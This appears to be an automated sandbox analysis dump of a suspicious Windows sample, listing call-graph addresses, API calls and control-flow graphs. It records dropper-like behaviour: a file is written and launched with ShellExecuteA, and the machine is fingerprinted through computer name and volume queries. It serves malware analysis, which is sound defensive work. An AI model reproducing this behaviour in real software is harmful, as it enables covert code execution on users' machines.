__startOneArgErrorHandling 8877->8882 8886 10043980 8877->8886 8879 10041d1e 8881 10041d2a 8879->8881 8893 10043c94 8879->8893 8900 10044c0d 8881->8900 8882->8879 8889 10043655 8882->8889 8885 1003fc22 8885->8835 8907 100439a3 8886->8907 8890 1004367d 8889->8890 8891 10044c0d _abort 5 API calls 8890->8891 8892 1004369a 8891->8892 8892->8879 8894 10043cb6 8893->8894 8895 10043ca1 8893->8895 
8897 100415d3 __dosmaperr 20 API calls 8894->8897 8896 10043cbb 8895->8896 8911 100415d3 8895->8911 8896->8881 8897->8896 8901 10044c16 8900->8901 8902 10044c18 IsProcessorFeaturePresent 8900->8902 8901->8885 8904 10044cb7 8902->8904 9025 10044c7b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8904->9025 8906 10044d9a 8906->8885 8908 100439ce __raise_exc 8907->8908 8909 10043bc7 RaiseException 8908->8909 8910 1004399e 8909->8910 8910->8882 8914 100418df GetLastError 8911->8914 8915 100418fe 8914->8915 8916 100418f8 8914->8916 8921 10041955 SetLastError 8915->8921 8940 10042039 8915->8940 8933 10042206 8916->8933 8920 10041918 8947 10042096 8920->8947 8923 100415d8 8921->8923 8923->8881 8926 1004191e 8928 1004194c SetLastError 8926->8928 8927 10041934 8960 10041797 8927->8960 8928->8923 8931 10042096 _free 17 API calls 8932 10041945 8931->8932 8932->8921 8932->8928 8965 100420ef 8933->8965 8935 1004222d 8936 10042245 TlsGetValue 8935->8936 8937 10042239 8935->8937 8936->8937 8938 10044c0d _abort 5 API calls 8937->8938 8939 10042256 8938->8939 8939->8915 8945 10042046 __dosmaperr 8940->8945 8941 10042086 8944 100415d3 __dosmaperr 19 API calls 8941->8944 8942 10042071 RtlAllocateHeap 8943 10041910 8942->8943 8942->8945 8943->8920 8953 1004225c 8943->8953 8944->8943 8945->8941 8945->8942 8978 10044356 8945->8978 8948 100420a1 HeapFree 8947->8948 8952 100420ca __dosmaperr 8947->8952 8949 100420b6 8948->8949 8948->8952 8950 100415d3 __dosmaperr 18 API calls 8949->8950 8951 100420bc GetLastError 8950->8951 8951->8952 8952->8926 8954 100420ef __dosmaperr 5 API calls 8953->8954 8955 10042283 8954->8955 8956 1004229e TlsSetValue 8955->8956 8957 10042292 8955->8957 8956->8957 8958 10044c0d _abort 5 API calls 8957->8958 8959 1004192d 8958->8959 8959->8920 8959->8927 8993 1004176f 8960->8993 8966 1004211f __dosmaperr 8965->8966 8969 1004211b 8965->8969 8966->8935 8967 1004213f 8967->8966 8970 1004214b GetProcAddress 8967->8970 8969->8966 
8969->8967 8971 1004218b 8969->8971 8970->8966 8972 100421a1 8971->8972 8973 100421ac LoadLibraryExW 8971->8973 8972->8969 8974 100421c9 GetLastError 8973->8974 8976 100421e1 8973->8976 8975 100421d4 LoadLibraryExW 8974->8975 8974->8976 8975->8976 8976->8972 8977 100421f8 FreeLibrary 8976->8977 8977->8972 8983 1004439a 8978->8983 8980 10044c0d _abort 5 API calls 8981 10044396 8980->8981 8981->8945 8982 1004436c 8982->8980 8984 100443a6 _abort 8983->8984 8989 10042813 RtlEnterCriticalSection 8984->8989 8986 100443b1 8990 100443e3 8986->8990 8988 100443d8 _abort 8988->8982 8989->8986 8991 1004282a _abort RtlLeaveCriticalSection 8990->8991 8992 100443ea 8991->8992 8992->8988 8999 100416ff 8993->8999 8995 10041793 8996 10041747 8995->8996 9009 100416af 8996->9009 8998 1004176b 8998->8931 9000 1004170b _abort 8999->9000 9005 10042813 RtlEnterCriticalSection 9000->9005 9002 10041715 9006 1004173b 9002->9006 9004 10041733 _abort 9004->8995 9005->9002 9007 1004282a _abort RtlLeaveCriticalSection 9006->9007 9008 10041745 9007->9008 9008->9004 9010 100416bb _abort 9009->9010 9017 10042813 RtlEnterCriticalSection 9010->9017 9012 100416c5 9018 10041810 9012->9018 9014 100416dd 9022 100416f3 9014->9022 9016 100416eb _abort 9016->8998 9017->9012 9019 1004181f __fassign 9018->9019 9020 10041846 __fassign 9018->9020 9019->9020 9021 100424ff __fassign 20 API calls 9019->9021 9020->9014 9021->9020 9023 1004282a _abort RtlLeaveCriticalSection 9022->9023 9024 100416fd 9023->9024 9024->9016 9025->8906 9794 10001130 GetPEB 9816 10004b70 GetUserDefaultUILanguage 9817 10004b82 9816->9817 10086 10007db0 10087 10007d08 10086->10087 10088 10007cfc WideCharToMultiByte 10087->10088 10089 10007e39 10087->10089 10088->10087 10088->10089 9727 100422b5 9728 100420ef __dosmaperr 5 API calls 9727->9728 9729 100422dc 9728->9729 9730 100422fa InitializeCriticalSectionAndSpinCount 9729->9730 9731 100422e5 9729->9731 9730->9731 9732 10044c0d _abort 5 API calls 9731->9732 9733 10042311 9732->9733 10122 
10027df0 10126 10027d20 10122->10126 10123 10027e06 GetComputerNameW 10128 10027d37 10123->10128 10124 10027d30 10125 10027d6c GetVolumeInformationW 10124->10125 10124->10128 10126->10122 10126->10123 10126->10124 10126->10125 10127 10027d83 GetWindowsDirectoryW 10126->10127 10126->10128 10127->10124 10127->10128 9818 10047977 9819 10047984 9818->9819 9820 10047999 9818->9820 9821 100415d3 __dosmaperr 20 API calls 9819->9821 9825 10047994 9820->9825 9834 10047671 9820->9834 9822 10047989 9821->9822 9824 10041517 _abort 26 API calls 9822->9824 9824->9825 9830 100479bb 9851 10048664 9830->9851 9833 10042096 _free 20 API calls 9833->9825 9835 10047685 9834->9835 9836 10047689 9834->9836 9840 100477ff 9835->9840 9836->9835 9837 10047951 26 API calls 9836->9837 9838 100476a9 9837->9838 9866 1004812c 9838->9866 9841 10047815 9840->9841 9842 10047826 9840->9842 9841->9842 9843 10042096 _free 20 API calls 9841->9843 9844 10047951 9842->9844 9843->9842 9845 10047972 9844->9845 9846 1004795d 9844->9846 9845->9830 9847 100415d3 __dosmaperr 20 API calls 9846->9847 9848 10047962 9847->9848 9849 10041517 _abort 26 API calls 9848->9849 9850 1004796d 9849->9850 9850->9830 9852 10048673 9851->9852 9853 10048688 9851->9853 9854 100415c0 __dosmaperr 20 API calls 9852->9854 9855 100486c3 9853->9855 9860 100486af 9853->9860 9857 10048678 9854->9857 9856 100415c0 __dosmaperr 20 API calls 9855->9856 9858 100486c8 9856->9858 9859 100415d3 __dosmaperr 20 API calls 9857->9859 9862 100415d3 __dosmaperr 20 API calls 9858->9862 9863 100479c1 9859->9863 10039 1004863c 9860->10039 9864 100486d0 9862->9864 9863->9825 9863->9833 9865 10041517 _abort 26 API calls 9864->9865 9865->9863 9867 10048138 _abort 9866->9867 9868 10048140 9867->9868 9869 10048158 9867->9869 9891 100415c0 9868->9891 9870 100481f6 9869->9870 9875 1004818d 9869->9875 9872 100415c0 __dosmaperr 20 API calls 9870->9872 9874 100481fb 9872->9874 9877 100415d3 __dosmaperr 20 API calls 9874->9877 9894 10048423 RtlEnterCriticalSection 
9875->9894 9876 100415d3 __dosmaperr 20 API calls 9879 1004814d _abort 9876->9879 9880 10048203 9877->9880 9879->9835 9882 10041517 _abort 26 API calls 9880->9882 9881 10048193 9883 100481c4 9881->9883 9884 100481af 9881->9884 9882->9879 9895 10048217 9883->9895 9885 100415d3 __dosmaperr 20 API calls 9884->9885 9887 100481b4 9885->9887 9888 100415c0 __dosmaperr 20 API calls 9887->9888 9889 100481bf 9888->9889 9946 100481ee 9889->9946 9892 100418df __dosmaperr 20 API calls 9891->9892 9893 100415c5 9892->9893 9893->9876 9894->9881 9896 10048245 9895->9896 9897 1004823e 9895->9897 9898 10048268 9896->9898 9899 10048249 9896->9899 9900 10044c0d _abort 5 API calls 9897->9900 9902 100482b9 9898->9902 9903 1004829c 9898->9903 9901 100415c0 __dosmaperr 20 API calls 9899->9901 9904 1004841f 9900->9904 9905 1004824e 9901->9905 9907 100482cf 9902->9907 9949 10048838 9902->9949 9906 100415c0 __dosmaperr 20 API calls 9903->9906 9904->9889 9908 100415d3 __dosmaperr 20 API calls 9905->9908 9912 100482a1 9906->9912 9952 10047dbc 9907->9952 9910 10048255 9908->9910 9913 10041517 _abort 26 API calls 9910->9913 9915 100415d3 __dosmaperr 20 API calls 9912->9915 9913->9897 9918 100482a9 9915->9918 9916 10048316 9922 10048370 WriteFile 9916->9922 9923 1004832a 9916->9923 9917 100482dd 9919 100482e1 9917->9919 9920 10048303 9917->9920 9921 10041517 _abort 26 API calls 9918->9921 9932 100483d7 9919->9932 9959 10047d4f 9919->9959 9964 10047b9c GetConsoleCP 9920->9964 9921->9897 9927 10048393 GetLastError 9922->9927 9933 100482f9 9922->9933 9924 10048360 9923->9924 9925 10048332 9923->9925 9990 10047e32 9924->9990 9928 10048337 9925->9928 9929 10048350 9925->9929 9927->9933 9928->9932 9975 10047f11 9928->9975 9982 10047fff 9929->9982 9932->9897 9935 100415d3 __dosmaperr 20 API calls 9932->9935 9933->9897 9933->9932 9936 100483b3 9933->9936 9938 100483fc 9935->9938 9940 100483ce 9936->9940 9941 100483ba 9936->9941 9939 100415c0 __dosmaperr 20 API calls 9938->9939 9939->9897 9997 1004159d 
9940->9997 9942 100415d3 __dosmaperr 20 API calls 9941->9942 9944 100483bf 9942->9944 9945 100415c0 __dosmaperr 20 API calls 9944->9945 9945->9897 10038 10048446 RtlLeaveCriticalSection 9946->10038 9948 100481f4 9948->9879 10002 100487ba 9949->10002 10024 10048564 9952->10024 9954 10047dd1 9954->9916 9954->9917 9955 10047dcc 9955->9954 9956 1004185b _abort 38 API calls 9955->9956 9957 10047df4 9956->9957 9957->9954 9958 10047e12 GetConsoleMode 9957->9958 9958->9954 9960 10047da9 9959->9960 9962 10047d74 9959->9962 9960->9933 9961 10048853 WriteConsoleW CreateFileW 9961->9962 9962->9960 9962->9961 9963 10047dab GetLastError 9962->9963 9963->9960 9970 10047bff 9964->9970 9974 10047d11 9964->9974 9965 10044c0d _abort 5 API calls 9967 10047d4b 9965->9967 9967->9933 9968 10047937 40 API calls __fassign 9968->9970 9969 10047c85 WideCharToMultiByte 9971 10047cab WriteFile 9969->9971 9969->9974 9970->9968 9970->9969 9973 10047cdc WriteFile 9970->9973 9970->9974 10033 1004304d 9970->10033 9971->9970 9972 10047d34 GetLastError 9971->9972 9972->9974 9973->9970 9973->9972 9974->9965 9980 10047f20 9975->9980 9976 10047fe2 9977 10044c0d _abort 5 API calls 9976->9977 9979 10047ffb 9977->9979 9978 10047f9e WriteFile 9978->9980 9981 10047fe4 GetLastError 9978->9981 9979->9933 9980->9976 9980->9978 9981->9976 9989 1004800e 9982->9989 9983 10048119 9984 10044c0d _abort 5 API calls 9983->9984 9985 10048128 9984->9985 9985->9933 9986 10048090 WideCharToMultiByte 9987 100480c5 WriteFile 9986->9987 9988 10048111 GetLastError 9986->9988 9987->9988 9987->9989 9988->9983 9989->9983 9989->9986 9989->9987 9994 10047e41 9990->9994 9991 10047ef4 9993 10044c0d _abort 5 API calls 9991->9993 9992 10047eb3 WriteFile 9992->9994 9995 10047ef6 GetLastError 9992->9995 9996 10047f0d 9993->9996 9994->9991 9994->9992 9995->9991 9996->9933 9998 100415c0 __dosmaperr 20 API calls 9997->9998 9999 100415a8 __dosmaperr 9998->9999 10000 100415d3 __dosmaperr 20 API calls 9999->10000 10001 100415bb 10000->10001 
10001->9897 10011 100484fa 10002->10011 10004 100487cc 10005 100487d4 10004->10005 10006 100487e5 SetFilePointerEx 10004->10006 10007 100415d3 __dosmaperr 20 API calls 10005->10007 10008 100487d9 10006->10008 10009 100487fd GetLastError 10006->10009 10007->10008 10008->9907 10010 1004159d __dosmaperr 20 API calls 10009->10010 10010->10008 10012 10048507 10011->10012 10015 1004851c 10011->10015 10013 100415c0 __dosmaperr 20 API calls 10012->10013 10014 1004850c 10013->10014 10017 100415d3 __dosmaperr 20 API calls 10014->10017 10016 100415c0 __dosmaperr 20 API calls 10015->10016 10018 10048541 10015->10018 10019 1004854c 10016->10019 10020 10048514 10017->10020 10018->10004 10021 100415d3 __dosmaperr 20 API calls 10019->10021 10020->10004 10022 10048554 10021->10022 10023 10041517 _abort 26 API calls 10022->10023 10023->10020 10025 10048571 10024->10025 10026 1004857e 10024->10026 10027 100415d3 __dosmaperr 20 API calls 10025->10027 10029 1004858a 10026->10029 10030 100415d3 __dosmaperr 20 API calls 10026->10030 10028 10048576 10027->10028 10028->9955 10029->9955 10031 100485ab 10030->10031 10032 10041517 _abort 26 API calls 10031->10032 10032->10028 10034 1004185b _abort 38 API calls 10033->10034 10035 10043058 10034->10035 10036 10041964 __fassign 38 API calls 10035->10036 10037 10043068 10036->10037 10037->9970 10038->9948 10042 100485ba 10039->10042 10041 10048660 10041->9863 10043 100485c6 _abort 10042->10043 10053 10048423 RtlEnterCriticalSection 10043->10053 10045 100485d4 10046 10048606 10045->10046 10047 100485fb 10045->10047 10048 100415d3 __dosmaperr 20 API calls 10046->10048 10054 100486e3 10047->10054 10050 10048601 10048->10050 10069 10048630 10050->10069 10052 10048623 _abort 10052->10041 10053->10045 10055 100484fa 26 API calls 10054->10055 10058 100486f3 10055->10058 10056 100486f9 10072 10048469 10056->10072 10058->10056 10061 100484fa 26 API calls 10058->10061 10068 1004872b 10058->10068 10059 100484fa 26 API calls 10062 10048737 CloseHandle 
10059->10062 10064 10048722 10061->10064 10062->10056 10065 10048743 GetLastError 10062->10065 10063 10048773 10063->10050 10067 100484fa 26 API calls 10064->10067 10065->10056 10066 1004159d __dosmaperr 20 API calls 10066->10063 10067->10068 10068->10056 10068->10059 10081 10048446 RtlLeaveCriticalSection 10069->10081 10071 1004863a 10071->10052 10073 100484df 10072->10073 10074 10048478 10072->10074 10075 100415d3 __dosmaperr 20 API calls 10073->10075 10074->10073 10080 100484a2 10074->10080 10076 100484e4 10075->10076 10077 100415c0 __dosmaperr 20 API calls 10076->10077 10078 100484cf 10077->10078 10078->10063 10078->10066 10079 100484c9 SetStdHandle 10079->10078 10080->10078 10080->10079 10081->10071 9701 10040070 9702 1004007c 9701->9702 9705 1003ffe2 9702->9705 9706 1003fff9 9705->9706 9707 100415d3 __dosmaperr 20 API calls 9706->9707 9710 10040047 9706->9710 9708 1004003d 9707->9708 9709 10041517 _abort 26 API calls 9708->9709 9709->9710 9132 401475 memset 9133 58c000 9132->9133 9134 4014a2 __set_app_type _controlfp __getmainargs 9133->9134 9137 4013ff 9134->9137 9136 401518 exit 9138 40141a 9137->9138 9141 40108c memset memset 9138->9141 9140 401443 9140->9136 9142 401141 9141->9142 9143 40134e 9142->9143 9144 401164 strcmp 9142->9144 9143->9140 9145 401191 EntryPoint strcpy 9144->9145 9146 4011db EntryPoint getenv EntryPoint sprintf 9144->9146 9147 40126b fopen EntryPoint fwrite fclose 9145->9147 9146->9147 9148 401310 EntryPoint ShellExecuteA 9147->9148 9149 401349 9147->9149 9148->9149 9149->9140 9711 1004727a 9712 1003fd79 __fassign 38 API calls 9711->9712 9713 10047290 9712->9713 9714 1004729e 9713->9714 9715 100472b5 9713->9715 9716 100415d3 __dosmaperr 20 API calls 9714->9716 9718 100472ae 9715->9718 9720 100475b7 46 API calls 9715->9720 9717 100472a3 9716->9717 9719 10041517 _abort 26 API calls 9717->9719 9719->9718 9720->9715
Strings
Memory Dump Source
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
Similarity
• API ID:
• String ID: d$w
• API String ID: 0-2400632791
• Opcode ID: 8fc7dfa7953881f0eba443ccefee9132d4f71626532639c743b5b7031b98f681
• Instruction ID: 3b58a7d1205b496063c1b2204a8da8191e59d498b0b538c9a3f1341f54984d67
• Opcode Fuzzy Hash: 8fc7dfa7953881f0eba443ccefee9132d4f71626532639c743b5b7031b98f681
• Instruction Fuzzy Hash: 9AC15634D0C7CEAAD791C6E0BC05FAA3BE4DF423D0FD74496FA468A0B3D6249C489652
APIs
Memory Dump Source
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 1ff04f09876d43afbe914d0138f07400b2449b49151b2f80d9e5eed3b2134e1f
• Instruction ID: 4f459b812a85e78ac016215e267c0289a3fe05b3109a9c9d5ced4a8858fbf6f9
• Opcode Fuzzy Hash: 1ff04f09876d43afbe914d0138f07400b2449b49151b2f80d9e5eed3b2134e1f
• Instruction Fuzzy Hash: 81F1052CD0F2C29ED7D2C6207C407752BE4EB562E0FD74596FA4A860E2D7249F498326

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
Similarity
• API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID: %s\%s
• API String ID: 2742963760-4073750446
• Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
• Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
• Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
• Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59
Memory Dump Source
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                • Opcode ID: 3564e4d55fca24635c9f640a300f4ded4c124eb8b1f5c188f8f6fb43cfb90a2d
                                                                                                                • Instruction ID: 6513e1061100fd1b8b0ef08946528139e367ca05e908543a0b3ce9998732708d
                                                                                                                • Opcode Fuzzy Hash: 3564e4d55fca24635c9f640a300f4ded4c124eb8b1f5c188f8f6fb43cfb90a2d
                                                                                                                • Instruction Fuzzy Hash: B3A26F7190D3C18FE361DB18C850B9EBBE1EFC53D8F09495EE4889729AD735A90487A3

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 1042 401155-401162 1043 401141-40114a 1042->1043 1044 401164-40118b strcmp 1042->1044 1045 401150 1043->1045 1046 40134e-401354 1043->1046 1047 401191-4011d6 EntryPoint strcpy 1044->1047 1048 4011db-401268 EntryPoint getenv EntryPoint sprintf 1044->1048 1045->1044 1049 40126b-40130a fopen EntryPoint fwrite fclose 1047->1049 1048->1049 1050 401310-401344 EntryPoint ShellExecuteA 1049->1050 1051 401349 1049->1051 1050->1051
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2992075992-0
                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611591150-0
                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 1057 1000b180-1000b18f 1058 1000b2a3 1057->1058 1059 1000b2a5 1058->1059 1060 1000b306-1000b30b 1058->1060 1059->1060 1061 1000b2a7-1000b2c0 SetFilePointerEx 1059->1061 1067 1000b196-1000b1ba 1060->1067 1068 1000b23b 1060->1068 1064 1000b2c6 1061->1064 1065 1000b38d-1000b395 1061->1065 1064->1065 1066 1000b2cc-1000b2d0 1064->1066 1069 1000b2d6 1066->1069 1070 1000b1df-1000b1e6 1066->1070 1071 1000b1c0 1067->1071 1072 1000b3a6-1000b3ac 1067->1072 1068->1067 1073 1000b241 1068->1073 1069->1070 1074 1000b2dc-1000b2de 1069->1074 1071->1072 1075 1000b1c6-1000b1d3 1071->1075 1077 1000b3b2-1000b3b7 1072->1077 1078 1000b328-1000b346 SetFilePointerEx 1072->1078 1073->1060 1076 1000b247 1073->1076 1079 1000b2e0-1000b2ed WriteFile 1074->1079 1075->1079 1080 1000b1d9 1075->1080 1081 1000b322 1076->1081 1082 1000b24d 1076->1082 1080->1070 1080->1079 1081->1078 1083 1000b0d0-1000b0d8 SetFilePointerEx 1081->1083 1082->1081 1084 1000b253-1000b262 1082->1084 1085 1000b054-1000b056 1083->1085 1086 1000b0de 1083->1086 1087 1000b05c-1000b061 1085->1087 1086->1057
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE ref: 1000B2BA
                                                                                                                • WriteFile.KERNELBASE(?,?,00000004,?,00000000), ref: 1000B2E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 539440098-0
                                                                                                                • Opcode ID: 32631c146431d5caa784b435f80b75a1b640849307dfc12bec7041bd0071469d
                                                                                                                • Instruction ID: bfceab962039c3431f0d920990651090cd1c4c65727954dcb43a48a868385f99
                                                                                                                • Opcode Fuzzy Hash: 32631c146431d5caa784b435f80b75a1b640849307dfc12bec7041bd0071469d
                                                                                                                • Instruction Fuzzy Hash: DE318E7040CB80AEF301DF65886576FBFE0EF923E4F95859DE5D486299D3B889088793
                                                                                                                APIs
                                                                                                                • GetFileSize.KERNEL32(?,10008FCC,?,00000001,?,00000002,?,?), ref: 100098BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433856609-0
                                                                                                                • Opcode ID: d74f2fca9a77fe10a5de1895a53b4e69ebdba06ca88f7dd4cac146ae40992855
                                                                                                                • Instruction ID: 945e49c847fada588070ccd41f20cc94e8f566d75302129b1ddbdbf4f5afe422
                                                                                                                • Opcode Fuzzy Hash: d74f2fca9a77fe10a5de1895a53b4e69ebdba06ca88f7dd4cac146ae40992855
                                                                                                                • Instruction Fuzzy Hash: 0E910460C0D3C29FF792CA244D50A763BE0FB531E0F4A45AAE5C68A1AFDB259E05C353

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 1311 10027df0-10027dfa 1312 10027e00 1311->1312 1313 10028288-1002829a call 10010d80 1311->1313 1312->1313 1315 10027e06-10027e15 GetComputerNameW 1312->1315 1320 100282a0 1313->1320 1321 1002851e-1002852d call 10010d80 1313->1321 1316 100282b6-100282bb 1315->1316 1317 10027e1b 1315->1317 1317->1316 1319 10027e21-10027e2d 1317->1319 1320->1321 1323 100282a6 1320->1323 1325 10027dbc-10027dce 1323->1325 1326 100282ac 1323->1326 1333 10027d35 1325->1333 1334 10027d6c-10027d80 GetVolumeInformationW 1325->1334 1329 100282b2-100282b4 1326->1329 1330 10027d20-10027d2b 1326->1330 1329->1316 1331 10027d61-10027d68 1330->1331 1332 10027d2d-10027d94 1330->1332 1337 10027de5-10027dea 1331->1337 1338 10027d6a 1331->1338 1332->1331 1342 10027d96 1332->1342 1333->1334 1336 10027d37-10027d39 1333->1336 1339 10027d3b-10027d46 1336->1339 1340 10027d83-10027d8c GetWindowsDirectoryW 1337->1340 1341 10027dec 1337->1341 1338->1334 1338->1337 1343 10027d97-10027d98 1339->1343 1344 10027d48-10027dac 1339->1344 1340->1339 1346 10027d8e-10027da6 1340->1346 1341->1340 1345 10027dee 1341->1345 1342->1343 1347 10027de2 1343->1347 1348 10027d9a-10027d9f 1343->1348 1344->1343 1352 10027dae-10027db3 1344->1352 1345->1311 1346->1325 1351 10027da8 1346->1351 1351->1325 1353 10027daa-10027dba 1351->1353 1353->1325
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: f3dfdc31cc27183ae44ef31ee2d0972980f6737d7a8368bfb4877219d4919641
                                                                                                                • Instruction ID: 5044bc66183f9a0c8fb5e43b9644b69d944f4be2a2ad3dd314c0752b6b08d565
                                                                                                                • Opcode Fuzzy Hash: f3dfdc31cc27183ae44ef31ee2d0972980f6737d7a8368bfb4877219d4919641
                                                                                                                • Instruction Fuzzy Hash: CD21DA3890A2816BD361D710BC05BF93AF8FF52790FC2488AFA8C591D2D3647D498367
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: VhS`
                                                                                                                • API String ID: 0-1438808629
                                                                                                                • Opcode ID: fc3748b68d94d049562a0d418e99007f55a8802754c178d4ad4717a4a44346b7
                                                                                                                • Instruction ID: 81e7802e88a2e8759e0b2ab5fef3d46fa6bd4e812ee5d9bde0e72f4ce5cf71b6
                                                                                                                • Opcode Fuzzy Hash: fc3748b68d94d049562a0d418e99007f55a8802754c178d4ad4717a4a44346b7
                                                                                                                • Instruction Fuzzy Hash: BE71D331C0C3C38EF355C6248C146777BE2EB4A2E2F6686AAD5D58B0AED6778D44C352

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 1489 401000-40102e malloc 1490 401031-401039 1489->1490 1491 401087-40108b 1490->1491 1492 40103f-401085 1490->1492 1492->1490
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
